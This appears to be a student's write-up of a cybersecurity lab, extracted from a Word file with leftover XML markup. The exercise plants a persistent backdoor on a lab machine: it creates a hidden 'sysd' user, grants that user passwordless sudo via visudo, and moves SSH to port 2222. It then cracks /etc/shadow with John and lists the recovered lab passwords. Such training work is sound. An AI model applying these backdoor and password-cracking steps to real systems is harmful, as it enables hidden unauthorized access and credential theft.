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1: Shadow People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Create a secret user named sysd. Make sure this user doesn't have a home folder created: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useradd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u 900 -g sysd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sysd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Give your secret user a password:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:line="256.8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Passwd sysd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:line="256.8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cybersecurity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cybersecurity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useradd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-u 900</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -g sysd sysd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groupadd -g 900 sysd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useradd -u 900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-g sysd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sysd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Give your secret user full sudo access without the need for a password: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Sudo visudo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add “sysd ALL=(ALL) NOPASSWD:ALL” to the bottom of the script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Save and exit script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Test that sudo access works without your password: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Sudo visudo (it opens without asking for a password)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2: Smooth Sailing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Edit the sshd_config file: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Add “Port 2222”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Restart the SSH service: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sudo systemctl restart ssh.service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Exit the root account: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Type “exit” repeat until logged out of remote session.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SSH to the target machine using your sysd account and port 2222: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ssh sysd@192.168.6.105 -p 2222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Use sudo to switch to the root user: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sudo su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Step 4: Crack All the Passwords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SSH back to the system using your sysd account and port 2222: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ssh sysd@192.168.6.105 -p 2222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0"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalate your privileges to the root user. Use John to crack the entire /etc/shadow file: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sudo su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stallman: computer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babbage: freedom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mitnik: trustno1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lovelace: dragon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turing: lakers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student: Goodluck!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h.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Sysadmin: cybersecurity (I changed it to this at one point)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